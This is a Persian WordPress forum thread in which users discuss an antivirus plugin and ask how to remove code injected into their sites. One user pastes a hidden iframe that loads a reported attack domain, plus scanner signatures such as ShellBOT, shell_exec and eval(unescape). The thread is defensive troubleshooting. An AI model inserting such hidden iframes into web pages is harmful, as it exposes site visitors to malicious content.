انجمن


افزونه آنتی ویروس فارسی  (۱۳ نوشته)

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۵ سال پیش
    ۱۲ فروردین ۱۳۸۸ - ۱۲:۰۳

    سلام, دوستان سایتم فعلا غیر فعاله! دیگه مجبور شدم, افزونه رو اینجا بزارم :-(
    قبلا naghies در موردش توضیح داده دیگه من توضیح نمیدم :D
    لینک دانلود

  • آرمان

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۷۳
    تشکر شده: ۲۷ بار
    # نوشته شده: ۱۵ سال پیش
    ۱۳ فروردین ۱۳۸۸ - ۱۲:۳۷

    اینا رو لطفن بعدن توی یه تاپیک مجزا قرار بده که دیگه همه بدونن برای افزونه‌های فارسی به کجا مراجعه کنن :-)

  • AminSanaei

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۳۳
    تشکر شده: ۲۶ بار
    # نوشته شده: ۱۵ سال پیش
    ۱۹ اردیبهشت ۱۳۸۸ - ۱۲:۳۰

    جدیداً مثل اینکه یه تروجان تو کدهای وردپرسم جاخوش کرده. این آنتی ویروسها میتونن اونو از بین ببرن؟ کلاً راه حل امنیتی اینکه وردپرس دچار ویروس نشه چیه؟ :?

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۵ سال پیش
    ۱۹ اردیبهشت ۱۳۸۸ - ۱۲:۳۶

    نه باید خودتون از ببین ببریدش
    افزونه فقط بهتون اطلاع مید

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    امین
  • websoft

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۳۴
    تشکر شده: ۴۹ بار
    # نوشته شده: ۱۵ سال پیش
    ۱۹ اردیبهشت ۱۳۸۸ - ۱۳:۲۱

    بله : http://www.wpantivirus.com

  • AminSanaei

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۳۳
    تشکر شده: ۲۶ بار
    # نوشته شده: ۱۵ سال پیش
    ۱۹ اردیبهشت ۱۳۸۸ - ۱۴:۰۷

    خوب من الآن دیدم که هوار تا کد مخرب تو فایلهام دارم
    iframe src" iframes can sometimes be used by hackers to load their own adverts and code on your site.
    که فقط یکیش اینه

    <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
    <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
    <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
    <iframe src="h

    برای رفع اینها چکار باید بکنم. Akismet میتونه جلو این ویروسها رو بگیره؟

  • websoft

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۳۴
    تشکر شده: ۴۹ بار
    # نوشته شده: ۱۵ سال پیش
    ۱۹ اردیبهشت ۱۳۸۸ - ۱۴:۲۴

    اول اينكه آي فريم براي تبليغات هم خوب ميتونه استفاده بشه كه ممكنه به اون‌ها حساس باشه ، البته با دستور دومي كه شما داديد و بررسي لينك موجود ( دستي چك كنيد ) ، اين كد به پيوند داده شده متصل ميشه كه لينك مورد نظر مخرب هست. سنتي :-) حذفش كنيد.

    Reported Attack Site!
    This web site at jl.chura.pl has been reported as an attack site and has been blocked based on your security preferences.
  • AminSanaei

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۳۳
    تشکر شده: ۲۶ بار
    # نوشته شده: ۱۵ سال پیش
    ۱۹ اردیبهشت ۱۳۸۸ - ۱۶:۱۰

    خیلی زیادن :-( اگه از نو وردپرس رو نصب کنم از بین میرن؟ اینها از تو کامپیوتر من وارد شدن؟ چه جوری میرن لای کدهای دیگه؟ :?

  • AminSanaei

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۳۳
    تشکر شده: ۲۶ بار
    # نوشته شده: ۱۵ سال پیش
    ۲۰ اردیبهشت ۱۳۸۸ - ۱۴:۰۳

    من دوباره وردپرس رو نصب کردم. ویروسها خیلی کم شدن و فقط موندن اینها :?. اینها رو ویروس یاب به صورت رنگ زرد نشون داده

    String.fromCharCode
    
    iframe src
    
    ShellBOT
    
    uname -a
    
    shell_exec
    
    YW55cmVzdWx0cy5uZXQ=
    
    <u style='display:none'>
    
    eval(unescape
    
    $_COOKIE["yahg"]

    مثلاً این نمونه کدی هست که توش او بخش قرار داره:

    home/mortabet/public_html/wp-includes/js/scriptaculous/prototype.js

    return this.slice(0, this.length - 1) +
       String.fromCharCode(this.charCodeAt(this.length - 1) + 1);
        },
    
        times: function(count) {
        return count < 1 ? '' : new Array(count + 1).join(this);
        },
    
        camelize: function() {
        var parts = this.split('-'), len = parts.length;
        if (len =
  • عبدالماجد شه بخش ( ایجباری )

    آفلاین
    عضو فعال
    تعداد نوشته‌ها: ۱۰۳۱
    تشکر شده: ۱۴۳۲ بار
    # نوشته شده: ۱۳ سال پیش
    ۱ اردیبهشت ۱۳۹۰ - ۱۷:۰۰

    خوب تایپیک قدیمی هست ولی نیازی نیست من دوبااره از ال توضیح بدم و بگم چی شده . خلاصه افزونه ی anti virus رو نصب کردم و به تعداد زیاد خطا داد با رنگ قرمز و به یه سری از توابع مشکوک شده بود :

    bstr(file_get_contents(__FILE__),strripos(file_get_contents(__FI

    به تابع :

    file_get_contents

    گیر داده بود .
    یا به
    fopen
    یه جایی گیر داده بود ولی من از چند تا ترسیدم گویا مخرب باشن :

    DQoJCTxwIGNsYXNzPSJhbm5vdGF0aW9uIj7Yt9ix2KfYrdmKINi02K

    و

    ZhyDYqtmI2LPYtyA8YSBocmVmPSJodHRwOi8vd3d3LnBhZGRzb2x1dGlvbnMuY29tLyIgdGl0bGU9IlBhZGRTb2x1dGlvbnMiPlBhZGRTb2x1dGlvbnM8L2E

    و

    ZhyDYqNmHINmB2KfYsdiz2Yog2KrZiNiz2LcgPGEgaHJlZj0iaHR0cDovL3RoZW16LmlyLyIgdGl0bGU9Itiq2LHYrNmF2Ycg2Ygg2YjZitix2KfZiti0INm

    و ..... این آخریا شاید کد مخرب باشن یا اینکه به خاطر انکود بودن بهشون گیر داده .
    اگه دوستان اطلاعی داره لطف کنه راهنمایی کنه .

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۳ سال پیش
    ۳ اردیبهشت ۱۳۹۰ - ۰۰:۵۵

    احتمالا تابع fopen یک فایلی رو باز می‌کنه که محتویاتش اون رشته‌ها باشن! بررسی کن ببین توی سورس با چه الگوریتمی code می‌شه.

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    عبدالماجد شه بخش ( ایجباری )
  • عبدالماجد شه بخش ( ایجباری )

    آفلاین
    عضو فعال
    تعداد نوشته‌ها: ۱۰۳۱
    تشکر شده: ۱۴۳۲ بار
    # نوشته شده: ۱۳ سال پیش
    ۳ اردیبهشت ۱۳۹۰ - ۰۶:۱۸

    احتمالا تابع fopen یک فایلی رو باز می‌کنه که محتویاتش اون رشته‌ها باشن!

    بررسی میکردم ظاهرا هیچ فایلی رو باز نمیکرد .

    بررسی کن ببین توی سورس با چه الگوریتمی code می‌شه.

    کل کد :

    <?php $str ='CQk8L3A+DQoJCTxwIGNsYXNzPSJhbm5vdGF0aW9uIj7Yt9ix2KfYrdmKINi02K/ZhyDYqtmI2LPYtyA8YSBocmVmPSJodHRwOi8vd3d3LnBhZGRzb2x1dGlvbnMuY29tLyIgdGl0bGU9IlBhZGRTb2x1dGlvbnMiPlBhZGRTb2x1dGlvbnM8L2E+IHwg2KjYsdqv2LHYr9in2YbYr9mHINi02K/ZhyDYqNmHINmB2KfYsdiz2Yog2KrZiNiz2LcgPGEgaHJlZj0iaHR0cDovL3RoZW16LmlyLyIgdGl0bGU9Itiq2LHYrNmF2Ycg2Ygg2YjZitix2KfZiti0INm+2YjYs9iq2Ycg2YfYp9mKINmI2LHYr9m+2LHYs9iMINmB2LHZiNi02q/Yp9mHINm+2YjYs9iq2YfigIzZh9in24wg2YjYsdiv2b7YsdizIj7YqtmF2LI8L2E+PC9wPg0KCQk8ZGl2IGNsYXNzPSJjbGVhciI+PC9kaXY+DQoJPC9kaXY+';echo base64_decode($str);?>

    ممنون .

  • eskafild

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۰۷
    تشکر شده: ۱۷ بار
    # نوشته شده: ۱۲ سال پیش
    ۱۳ آبان ۱۳۹۰ - ۱۵:۰۶

    سلام
    لینک خرابه دوباره آپلودش کنید :(

درباره‌ی این موضوع